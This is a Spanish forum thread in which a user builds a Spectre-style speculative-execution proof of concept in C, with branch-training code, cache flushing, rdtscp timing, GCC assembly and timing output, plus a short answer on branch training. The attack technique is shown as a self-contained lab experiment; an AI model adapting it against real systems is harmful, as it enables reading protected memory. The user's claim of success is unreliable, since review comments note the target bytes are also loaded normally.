Spectre - Concepto de optimización de código / Entrenamiento de la rama [cerrado]

0

Estoy intentando cargar "a" (a minúscula) de forma especulativa usando Spectre.

Fue insinuado aquí:

Spectre PoC - Basado en el artículo - resultados opuestos

que el motivo por el que no se carga de forma especulativa podría ser:

  • rama no entrenada
  • optimización del compilador

Aquí está el código:

#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif




/*
 * First experiment: flush every probe line of array2 from the cache, store
 * through array2[array1[i] * 512] for every index except 103, then time one
 * load per candidate byte value, in shuffled order, and print the cycle
 * counts.
 *
 * NOTE(review): srand(time(NULL)) needs <time.h>, which this program's
 * include list does not contain.
 */
void main(void)
{
    /* 'A'..'Z' three times, 'A'..'Y' once, then 97 ('a') at index 103. */
    volatile uint8_t array1[104] = {
        65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,
        65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,
        65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,
        65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,
        97
    };

    /* One probe slot per possible byte value, 512 bytes apart. */
    uint8_t array2[256 * 512];

    /* sizeof yields size_t, so index with size_t rather than int. */
    for (size_t i = 0; i < sizeof(array2); i++) {
        array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
    }

    for (int i = 0; i < 256; i++) {
        _mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */
    }

    printf("%c is speculatively executed\n",array1[103]);

    /* Index 103 (value 97) is never stored through on the architectural path. */
    for (int i = 0; i < 104; i++) {
        if (i != 103) {
            array2[array1[i] * 512] = array1[i];
        }
    }

    /*
     * Candidate values to time: 'A'..'Z', 'a' (97) and '1' (49). No element
     * of array1 equals 49, so the loop above never stores to that slot.
     */
    uint8_t probe[28] = {
        65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,
        97,49
    };

    /*
     * Fisher-Yates shuffle of the probe order. It always finishes in 27 swaps
     * and needs no in-band "already used" marker, so it does not depend on
     * whether plain char is signed. Presumably the random order is there to
     * keep a hardware prefetcher from following a fixed stride.
     */
    srand((unsigned)time(NULL));
    for (int k = 27; k > 0; k--) {
        int pick = rand() % (k + 1);
        uint8_t tmp = probe[k];
        probe[k] = probe[pick];
        probe[pick] = tmp;
    }

    for (int k = 0; k < 28; k++) {
        int mix_i = probe[k];
        volatile uint8_t *addr = &array2[mix_i * 512];
        unsigned int aux = 0;          /* __rdtscp writes IA32_TSC_AUX here */

        uint64_t t0 = __rdtscp(&aux);  /* keep the full 64-bit counter */
        aux = *addr;                   /* the timed load (volatile, not elided) */
        int time_taken = (int)(__rdtscp(&aux) - t0);

        /* 49 ('1') is the control value; this line is printed regardless of the measured time. */
        if (mix_i == 49) {
            printf("%c is not cached\n",mix_i);
        }
        printf("trying: %c time: %i\n",mix_i,time_taken);
    }
}

Espero que la optimización del compilador no sea el problema.

2 preguntas:

  1. ¿Cómo puedo verificar si el compilador lo optimizó?
  2. ¿Cómo puedo entrenar la rama?

¿Alguien puede explicar lo segundo con este ejemplo o con uno más simple (con código de ejemplo y salidas de gdb)?

Gracias,

Actualización 1:

He compilado el fragmento sensible (el bucle for).

user@laptop:~/labspectre$ cat test.c
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>


/* Reduced test case: only the array1 -> array2 store loop, kept minimal so
   that the generated assembly can be inspected. */
void main(void)
{
/* 104 byte values: 'A'..'Z' three times, 'A'..'Y' once, then 97 ('a') at index 103 */
volatile uint8_t array1[104] = { 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90, 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,97 };

/* one slot per possible byte value, 512 bytes apart; not initialised in this test */
uint8_t array2[256 * 512];


int dummy = 0; /* never read in this function */
for(int i=0; i<104; i++) {
 /* skip only the last index (103), whose value is 97 */
 if (i != 103) {
    /* store the byte into the slot selected by its own value */
    array2[array1[i] * 512] = array1[i];
 }
}
}

Aquí está el volcado de asm:

user@laptop:~/labspectre$ cat test.s
    .file   "test.c"
    .text
    .globl  main
    .type   main, @function
main:
.LFB2:
    .cfi_startproc
    pushq   %rbp
    .cfi_def_cfa_offset 16
    .cfi_offset 6, -16
    movq    %rsp, %rbp
    .cfi_def_cfa_register 6
    subq    $131328, %rsp
    movq    %fs:40, %rax
    movq    %rax, -8(%rbp)
    xorl    %eax, %eax
    movb    $65, -131200(%rbp)
    movb    $66, -131199(%rbp)
    movb    $67, -131198(%rbp)
    movb    $68, -131197(%rbp)
    movb    $69, -131196(%rbp)
    movb    $70, -131195(%rbp)
    movb    $71, -131194(%rbp)
    movb    $72, -131193(%rbp)
    movb    $73, -131192(%rbp)
    movb    $74, -131191(%rbp)
    movb    $75, -131190(%rbp)
    movb    $76, -131189(%rbp)
    movb    $77, -131188(%rbp)
    movb    $78, -131187(%rbp)
    movb    $79, -131186(%rbp)
    movb    $80, -131185(%rbp)
    movb    $81, -131184(%rbp)
    movb    $82, -131183(%rbp)
    movb    $83, -131182(%rbp)
    movb    $84, -131181(%rbp)
    movb    $85, -131180(%rbp)
    movb    $86, -131179(%rbp)
    movb    $87, -131178(%rbp)
    movb    $88, -131177(%rbp)
    movb    $89, -131176(%rbp)
    movb    $90, -131175(%rbp)
    movb    $65, -131174(%rbp)
    movb    $66, -131173(%rbp)
    movb    $67, -131172(%rbp)
    movb    $68, -131171(%rbp)
    movb    $69, -131170(%rbp)
    movb    $70, -131169(%rbp)
    movb    $71, -131168(%rbp)
    movb    $72, -131167(%rbp)
    movb    $73, -131166(%rbp)
    movb    $74, -131165(%rbp)
    movb    $75, -131164(%rbp)
    movb    $76, -131163(%rbp)
    movb    $77, -131162(%rbp)
    movb    $78, -131161(%rbp)
    movb    $79, -131160(%rbp)
    movb    $80, -131159(%rbp)
    movb    $81, -131158(%rbp)
    movb    $82, -131157(%rbp)
    movb    $83, -131156(%rbp)
    movb    $84, -131155(%rbp)
    movb    $85, -131154(%rbp)
    movb    $86, -131153(%rbp)
    movb    $87, -131152(%rbp)
    movb    $88, -131151(%rbp)
    movb    $89, -131150(%rbp)
    movb    $90, -131149(%rbp)
    movb    $65, -131148(%rbp)
    movb    $66, -131147(%rbp)
    movb    $67, -131146(%rbp)
    movb    $68, -131145(%rbp)
    movb    $69, -131144(%rbp)
    movb    $70, -131143(%rbp)
    movb    $71, -131142(%rbp)
    movb    $72, -131141(%rbp)
    movb    $73, -131140(%rbp)
    movb    $74, -131139(%rbp)
    movb    $75, -131138(%rbp)
    movb    $76, -131137(%rbp)
    movb    $77, -131136(%rbp)
    movb    $78, -131135(%rbp)
    movb    $79, -131134(%rbp)
    movb    $80, -131133(%rbp)
    movb    $81, -131132(%rbp)
    movb    $82, -131131(%rbp)
    movb    $83, -131130(%rbp)
    movb    $84, -131129(%rbp)
    movb    $85, -131128(%rbp)
    movb    $86, -131127(%rbp)
    movb    $87, -131126(%rbp)
    movb    $88, -131125(%rbp)
    movb    $89, -131124(%rbp)
    movb    $90, -131123(%rbp)
    movb    $65, -131122(%rbp)
    movb    $66, -131121(%rbp)
    movb    $67, -131120(%rbp)
    movb    $68, -131119(%rbp)
    movb    $69, -131118(%rbp)
    movb    $70, -131117(%rbp)
    movb    $71, -131116(%rbp)
    movb    $72, -131115(%rbp)
    movb    $73, -131114(%rbp)
    movb    $74, -131113(%rbp)
    movb    $75, -131112(%rbp)
    movb    $76, -131111(%rbp)
    movb    $77, -131110(%rbp)
    movb    $78, -131109(%rbp)
    movb    $79, -131108(%rbp)
    movb    $80, -131107(%rbp)
    movb    $81, -131106(%rbp)
    movb    $82, -131105(%rbp)
    movb    $83, -131104(%rbp)
    movb    $84, -131103(%rbp)
    movb    $85, -131102(%rbp)
    movb    $86, -131101(%rbp)
    movb    $87, -131100(%rbp)
    movb    $88, -131099(%rbp)
    movb    $89, -131098(%rbp)
    movb    $97, -131097(%rbp)
    movq    -131200(%rbp), %rax
    movq    %rax, -131312(%rbp)
    movq    -131192(%rbp), %rax
    movq    %rax, -131304(%rbp)
    movq    -131184(%rbp), %rax
    movq    %rax, -131296(%rbp)
    movq    -131176(%rbp), %rax
    movq    %rax, -131288(%rbp)
    movq    -131168(%rbp), %rax
    movq    %rax, -131280(%rbp)
    movq    -131160(%rbp), %rax
    movq    %rax, -131272(%rbp)
    movq    -131152(%rbp), %rax
    movq    %rax, -131264(%rbp)
    movq    -131144(%rbp), %rax
    movq    %rax, -131256(%rbp)
    movq    -131136(%rbp), %rax
    movq    %rax, -131248(%rbp)
    movq    -131128(%rbp), %rax
    movq    %rax, -131240(%rbp)
    movq    -131120(%rbp), %rax
    movq    %rax, -131232(%rbp)
    movq    -131112(%rbp), %rax
    movq    %rax, -131224(%rbp)
    movq    -131104(%rbp), %rax
    movq    %rax, -131216(%rbp)
    movl    $0, -131316(%rbp)
    movl    $0, -131320(%rbp)
    jmp .L2
.L4:
    cmpl    $103, -131320(%rbp)
    je  .L3
    movl    -131320(%rbp), %eax
    cltq
    movzbl  -131312(%rbp,%rax), %eax
    movzbl  %al, %eax
    sall    $9, %eax
    movl    %eax, %ecx
    movl    -131320(%rbp), %eax
    cltq
    movzbl  -131312(%rbp,%rax), %edx
    movslq  %ecx, %rax
    movb    %dl, -131088(%rbp,%rax)
.L3:
    addl    $1, -131320(%rbp)
.L2:
    cmpl    $103, -131320(%rbp)
    jle .L4
    nop
    movq    -8(%rbp), %rax
    xorq    %fs:40, %rax
    je  .L5
    call    __stack_chk_fail
.L5:
    leave
    .cfi_def_cfa 7, 8
    ret
    .cfi_endproc
.LFE2:
    .size   main, .-main
    .ident  "GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.5) 5.4.0 20160609"
    .section    .note.GNU-stack,"",@progbits
user@laptop:~/labspectre$

A mí me parece bien. Veo la carga de la matriz y que:

cmpl    $103, -131320(%rbp)
        je  .L3

Comprueba el valor de 103 en el bucle.

¿Entonces NO está optimizado? ¿Cierto?

Actualización 3:

OK, esta vez creo que funciona. Cargo "a" y "b" de forma especulativa. Como puede ver, no se cargan en el código.

#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif




/*
 * Third experiment: repeatedly runs the `x < 103` branch with in-range
 * training values and, every sixth pass, with a random "malicious" value,
 * then times one load per candidate byte value in shuffled order and prints
 * the cycle counts.
 *
 * NOTE(review): srand(time(NULL)) needs <time.h>, which this program's
 * include list does not contain.
 */
void main(void)
{
    /* 'A'..'Z' three times, 'A'..'Y' once, then 'a' (97) and 'b' (98) at indices 103 and 104 */
    volatile uint8_t array1[105] = {
        65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,
        65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,
        65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,
        65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,
        97,98
    };

    /* One probe slot per possible byte value, 512 bytes apart. */
    uint8_t array2[256 * 512];

    /* sizeof yields size_t, so index with size_t rather than int. */
    for (size_t i = 0; i < sizeof(array2); i++) {
        array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
    }

    for (int i = 0; i < 256; i++) {
        _mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */
    }

    printf("%c and %c are speculatively executed/loaded\n",array1[103],array1[104]);

    srand((unsigned)time(NULL));

    unsigned int array1_size = 16;
    size_t malicious_x = rand();

    for (int tries = 999; tries > 0; tries--) {
        size_t training_x = tries % array1_size;

        /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
        for (int j = 29; j >= 0; j--) {
            /*
             * NOTE(review): array1_size is flushed here, but the branch below
             * compares x against the constant 103 and never reads it.
             */
            _mm_clflush(&array1_size);
            for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */

            /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
            /* Avoid jumps in case those tip off the branch predictor */
            size_t x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
            x = (x | (x >> 16)); /* Set x=-1 if j%6==0, else x=0 */
            x = training_x ^ (x & (malicious_x ^ training_x));

            /*
             * The "victim": the branch depends on x, the accesses on i.
             * NOTE(review): on every training pass (x < 103) this loop also
             * reads array1[103] and array1[104], so 'a' and 'b' are touched on
             * the architectural path too; the timings printed below do not by
             * themselves distinguish a speculative load from those accesses.
             */
            for (int i = 0; i < 105; i++) {
                if (x < 103) {
                    array2[array1[i] * 512] = array1[i];
                }
            }
        }
    }

    /*
     * Candidate values to time: 'A'..'Z', 'a' (97), '1' (49) and 'b' (98).
     * No element of array1 equals 49, so the victim loop never stores to
     * that slot.
     */
    uint8_t probe[29] = {
        65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,
        97,49,98
    };

    /*
     * Fisher-Yates shuffle of the probe order. It always finishes in 28 swaps
     * and needs no in-band "already used" marker, so it does not depend on
     * whether plain char is signed. Presumably the random order is there to
     * keep a hardware prefetcher from following a fixed stride.
     */
    for (int k = 28; k > 0; k--) {
        int pick = rand() % (k + 1);
        uint8_t tmp = probe[k];
        probe[k] = probe[pick];
        probe[pick] = tmp;
    }

    for (int k = 0; k < 29; k++) {
        int mix_i = probe[k];
        volatile uint8_t *addr = &array2[mix_i * 512];
        unsigned int aux = 0;          /* __rdtscp writes IA32_TSC_AUX here */

        uint64_t t0 = __rdtscp(&aux);  /* keep the full 64-bit counter */
        aux = *addr;                   /* the timed load (volatile, not elided) */
        int time_taken = (int)(__rdtscp(&aux) - t0);

        /* 49 ('1') is the control value; this line is printed regardless of the measured time. */
        if (mix_i == 49) {
            printf("%c is not cached\n",mix_i);
        }
        printf("trying: %c time: %i\n",mix_i,time_taken);
    }
}

Ejecución:

user@laptop:~/labspectre$ ./spectre9
a and b are speculatively executed/loaded
trying: P time: 96
trying: Y time: 92
trying: N time: 93
trying: A time: 118
trying: J time: 109
trying: O time: 92
trying: Z time: 92
1 is not cached
trying: 1 time: 316
trying: T time: 92
trying: X time: 93
trying: C time: 93
trying: R time: 92
trying: U time: 92
trying: G time: 92
trying: B time: 93
trying: E time: 93
trying: D time: 94
trying: M time: 93
trying: H time: 92
trying: Q time: 92
trying: V time: 93
trying: a time: 92
trying: b time: 134
trying: I time: 92
trying: L time: 93
trying: S time: 93
trying: W time: 92
trying: F time: 92
trying: K time: 270
user@laptop:~/labspectre$ ./spectre9
a and b are speculatively executed/loaded
trying: Y time: 96
trying: J time: 219
trying: S time: 121
trying: R time: 92
trying: O time: 93
trying: A time: 113
trying: M time: 95
trying: Q time: 95
trying: U time: 123
trying: I time: 93
trying: N time: 93
trying: Z time: 92
trying: E time: 93
trying: H time: 92
trying: W time: 93
trying: K time: 92
1 is not cached
trying: 1 time: 305
trying: b time: 93
trying: D time: 93
trying: C time: 93
trying: L time: 95
trying: T time: 92
trying: X time: 93
trying: B time: 93
trying: a time: 92
trying: G time: 93
trying: V time: 93
trying: P time: 93
trying: F time: 95
user@laptop:~/labspectre$ ./spectre9
a and b are speculatively executed/loaded
trying: W time: 96
trying: L time: 328
trying: I time: 93
1 is not cached
trying: 1 time: 305
trying: T time: 101
trying: G time: 93
trying: b time: 101
trying: E time: 93
trying: H time: 93
trying: F time: 93
trying: O time: 93
trying: C time: 122
trying: Q time: 94
trying: V time: 94
trying: a time: 93
trying: B time: 93
trying: A time: 96
trying: P time: 92
trying: Y time: 97
trying: Z time: 92
trying: S time: 93
trying: N time: 92
trying: U time: 92
trying: K time: 101
trying: J time: 93
trying: X time: 93
trying: M time: 93
trying: R time: 93
trying: D time: 107
user@laptop:~/labspectre$ ./spectre9
a and b are speculatively executed/loaded
trying: Q time: 941
trying: M time: 109
trying: A time: 101
trying: W time: 122
trying: N time: 93
trying: R time: 133
trying: H time: 94
trying: G time: 93
trying: Z time: 92
trying: B time: 94
trying: O time: 92
trying: C time: 98
trying: Y time: 93
trying: D time: 93
trying: F time: 92
trying: U time: 93
trying: P time: 95
trying: V time: 93
trying: S time: 93
trying: b time: 101
trying: T time: 92
trying: X time: 94
trying: I time: 93
trying: L time: 93
trying: E time: 92
trying: K time: 92
1 is not cached
trying: 1 time: 288
trying: a time: 92
trying: J time: 93

Los accesos a valores en caché tardan aprox. 90 ciclos; los no cacheados, aprox. 300 ciclos.

    
pregunta android_dev 18.01.2018 - 13:45
fuente

1 respuesta

1
  

¿Cómo puedo verificar si el compilador lo optimizó?

Compile a ensamblador. En GCC esto se hace con la opción "-S". Luego compare el ensamblador con el código; por supuesto, debe saber leer ensamblador.

  

¿Cómo puedo entrenar la rama?

Vea la línea 59 del exploit de ejemplo (enlace).

Se realiza la acción muchas veces con un valor que hace que se tome la rama. Luego se pasa al valor que no la toma, de una forma que no sea "obvia" para el procesador.

    
respondido por el Hector 18.01.2018 - 14:03
fuente

Lea otras preguntas en las etiquetas